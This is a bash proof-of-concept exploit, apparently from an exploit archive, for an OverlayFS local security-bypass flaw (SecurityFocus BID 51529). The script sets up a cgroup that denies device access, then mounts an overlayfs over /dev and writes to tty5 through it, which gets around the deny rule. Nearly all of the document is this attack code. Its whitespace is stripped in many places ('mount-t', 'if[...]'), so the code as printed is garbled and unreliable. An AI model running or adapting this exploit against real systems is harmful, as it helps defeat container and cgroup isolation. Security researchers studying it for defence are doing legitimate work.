#source: https://www.securityfocus.com/bid/51529/info#OverlayFS is prone to a local security-bypass vulnerability.#Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. #!/bin/bashddir=`cat /proc/self/mountinfo |grep cgroup |grep devices |awk'{ print $5 }'`if["x$ddir"="x"];thenecho"couldn't find devices cgroup mountpoint"exit1fi# create new cgroupndir=`mktemp -d--tmpdir=$ddir exploit-XXXX`# create a directory onto which we mount the overlayodir=`mktemp -d--tmpdir=/mnt exploit-XXXX`# create the directory to be the overlay dir (where changes# will be written)udir=`mktemp -d--tmpdir=/tmp exploit-XXX`mount-t overlayfs -oupperdir=$udir,lowerdir=/dev none $odirecho$$>$ndir/tasks
# deny all device actionsecho a >$ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable# overlayecho"c 4:5 m">$ndir/devices.allow
echo"devices.list: XXXXXXXXXXXXXXX"cat$ndir/devices.list
echo"XXXXXXXXXXXX"# try writing to /dev/tty5 - not allowedecho x > /dev/tty5
echo"write to /dev/tty5 returned $?"# try writing to tty5 on the overlayfs - SHOULD not be allowedecho y >$odir/tty5
echo"write to $odir/tty5 returned $?"umount$odirrmdir$odirrm-rf$udir# move ourselves back to root cgroup (else we can't delete the temp one# bc it's occupied - by us)echo$$>$ddir/tasks
rmdir$ndir
